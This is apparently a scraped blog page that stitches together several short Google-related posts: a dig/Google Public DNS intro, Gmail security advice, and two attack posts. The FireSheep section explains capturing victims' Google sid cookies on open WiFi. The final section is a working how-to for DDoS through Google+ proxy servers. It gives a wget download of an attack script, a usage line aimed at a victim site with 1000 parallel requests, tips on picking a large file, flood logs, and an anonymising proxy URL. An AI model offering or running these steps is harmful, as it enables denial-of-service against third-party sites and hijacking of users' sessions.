Home Linux Tools

Google

digDomain Information Groper is a light weight Linux utility for querying DNS records. It is widely used to diagnose DNS servers, troubleshoot DNS servers, purge DNS Cache using external DNS server and dozen of great features it provides.

Here i am sharing quick cheat sheet of dig – DNS Lookup utility that every System/Network administrator should have print out at their desk.

In our examples, 8.8.8.8 is a Google Public DNS Server that can be use in /etc/resolv.conf

Why to use Google Public DNS ?

If you have a DNS record with high ttl e.g 3600 seconds, your local DNS server may not purge the old record from the cache. So better you use Google public DNS server to resolve it most recent update record.

[Keep Reading…]

Google and Web Performance

Well, we should accept that Google is working hard to improve user experience on web. They have proved with their search engine, soon then launch Gmail as super fast web mail that allowed more storage for users and so many other initiatives that includes spdy alternative http protocol.

Few months back they launched Public DNS Service which claimed to be Super FAST dns server publicly available.

Google DNS Servers : 8.8.8.8 & 8.8.4.4

[Keep Reading…]

You can find our previous post regarding HowTo use Firesheep on linux.

FireSheep is a small firefox extension that does big jobs for you :-D e.g http sessions hijacking

What is FireSheep Extended?

This release is focused on Google search. If you are using Google Search services using a unsecured Wifi network, you searches are visible to MITM guys.

How it work?

When you are logged in on gmail.com and use google searches, Google’s sid cookie is easily captured through FireSheep. As soon you see sid cookie click on it and see visited links by victim.

How to be safe from FireSheep extended release?

Don’t use Google search while you are logged in on gmail.com on unsecured WiFi Networks.

What do you suggest for mitigation ? Share your thought in comments :-)

Google suggested all users that access gmail accounts from Iran. Google broadcasted this news on GoogleOnlineSecurity Official blog.

Last month Google updated a similar thread on blog where MITM (Man in the middle attack) was attempted.

Some precautions recommended by Google is as follows

  • Change your Gmail password.
  • Verify your account recovery options. e.g second mail address, phone numbers, and other info that is filled to use in account recovery time.
  • Review websites that is allowed to access your account.
  • Check for suspicious forwarders/remote smtp.
  • Be smart to warnings/popups appears.

Recently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy :-D

How DDoS Attack Using Google+ Servers works?

When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.

Advisory report says;  vulnerable pages are “/_/sharebox/linkpreview/“  and “gadgets/proxy?

So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.

How to use DDoS script to launch a DDoS attack Using Google+ Servers?

Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com

Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh

Make it executable :
chmod u+x ddos.sh

Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000

Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.

e.g http://www.victim-website.com/some-file-url/file-name.mp3

NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation :-D

e.g 1000 is very big number.

You will see anonymous source instead of Real Source IP:
See sample apache webserver log below

209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"

You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :

https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none

If you have any question or unable to run this, Feel free to write us :-)